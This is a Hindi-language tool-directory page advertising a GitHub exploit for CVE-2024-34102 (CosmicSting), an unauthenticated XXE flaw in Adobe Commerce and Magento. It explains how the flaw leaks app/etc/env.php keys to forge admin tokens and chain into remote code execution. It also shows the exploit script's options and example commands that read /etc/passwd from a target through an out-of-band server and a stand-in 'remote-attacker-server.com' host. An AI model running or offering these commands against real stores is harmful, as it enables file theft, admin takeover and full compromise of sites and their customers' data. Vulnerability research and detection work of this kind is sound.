Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento — CosmicSting: Adobe Commerce और Magento में गंभीर बिना-प्रमाणीकरण XXE भेद्यता (CVE-2024-34102) | Kitploit
उपकरण/GitHubGitHub/jakabakos/cve-2024-34102-cosmicsting-xxe-in-adobe-commerce-and-magento
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubjakabakos/cve-2024-34102-cosmicsting-xxe-in-adobe-commerce-and-magento

CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento

CosmicSting: Adobe Commerce और Magento में गंभीर बिना-प्रमाणीकरण XXE भेद्यता (CVE-2024-34102)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
912 साल पहलेअभी तक समीक्षित नहीं

CosmicSting: Adobe Commerce और Magento में गंभीर बिना प्रमाणीकरण वाली XXE भेद्यता (CVE-2024-34102)

CVE-2024-34102 Adobe Commerce और Magento में नेस्टेड डिसीरियलाइज़ेशन के अनुचित प्रबंधन से उत्पन्न होने वाली एक गंभीर सुरक्षा भेद्यता है। यह भेद्यता हमलावरों को डिसीरियलाइज़ेशन प्रक्रिया के दौरान XML External Entities (XXE) का दोहन करने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड निष्पादन हो सकता है। संक्षेप में, हमलावर दुर्भावनापूर्ण JSON पेलोड तैयार कर सकते हैं, जिन्हें एप्लिकेशन द्वारा डिसीरियलाइज़ करने पर अनपेक्षित गुणों या व्यवहारों वाले ऑब्जेक्ट इंस्टैंशिएट होते हैं। इससे विभिन्न सुरक्षा जोखिम उत्पन्न हो सकते हैं।

इस भेद्यता का दोहन करने से हमलावर REST API, GraphQL API, या SOAP API तक अनधिकृत व्यवस्थापक पहुँच प्राप्त कर सकते हैं, जिससे संभावित रूप से डेटा चोरी, सेवा व्यवधान और प्रभावित सिस्टम का पूर्ण समझौता हो सकता है। यह भेद्यता महत्वपूर्ण जोखिम उत्पन्न करती है क्योंकि यह संवेदनशील फ़ाइलों, जैसे कि app/etc/env.php, को बाहर निकालने में सक्षम है, जिसमें प्रमाणीकरण के लिए उपयोग की जाने वाली क्रिप्टोग्राफ़िक कुंजियाँ होती हैं। हमलावर इसका दोहन करके व्यवस्थापक टोकन बना सकते हैं और विशेषाधिकार प्राप्त उपयोगकर्ताओं के रूप में Magento के API में हेरफेर कर सकते हैं।

इसके अलावा, CVE-2024-34102 को अन्य भेद्यताओं के साथ जोड़ा जा सकता है, जैसे कि PHP फ़िल्टर चेन एक्सप्लॉइट (CVE-2024-2961), जिससे रिमोट कोड निष्पादन (RCE) हो सकता है। XML External Entity (XXE) भेद्यताओं के व्यापक निहितार्थ हमलावरों को बाहरी स्रोतों से डेटा प्राप्त करने और उसमें हेरफेर करने में सक्षम बनाते हैं, जिससे समझौता किए गए सिस्टम पर संभावित प्रभाव और बढ़ जाता है।

उपयोग

root@kitploit:~
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]

Exploit script for XXE vulnerability

options:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        Target URL (http(s)://ip[:port])
  --read-file READ_FILE, -r READ_FILE
                        File to read from the remote host
  --oob-server OOB_SERVER, -ob OOB_SERVER
                        OOB server URL (http(s)://ip[:port])
  --host-server HOST_SERVER, -hs HOST_SERVER
                        Host server URL (http(s)://ip[:port])

उदाहरण

root@kitploit:~
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"

# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"

# Detection
python3 detect.py -t https://magento.test

अस्वीकरण

यह एक्सप्लॉइट स्क्रिप्ट केवल शोध और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्य से बनाई गई है। इसका उपयोग किसी भी दुर्भावनापूर्ण या अनधिकृत गतिविधियों के लिए नहीं किया जाना है। स्क्रिप्ट के लेखक और स्वामी इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी या दायित्व अस्वीकार करते हैं। उपयोगकर्ताओं से आग्रह किया जाता है कि वे इस सॉफ़्टवेयर का ज़िम्मेदारी से और केवल लागू कानूनों और विनियमों के अनुसार उपयोग करें। ज़िम्मेदारी से उपयोग करें।

टूल डाउनलोड करें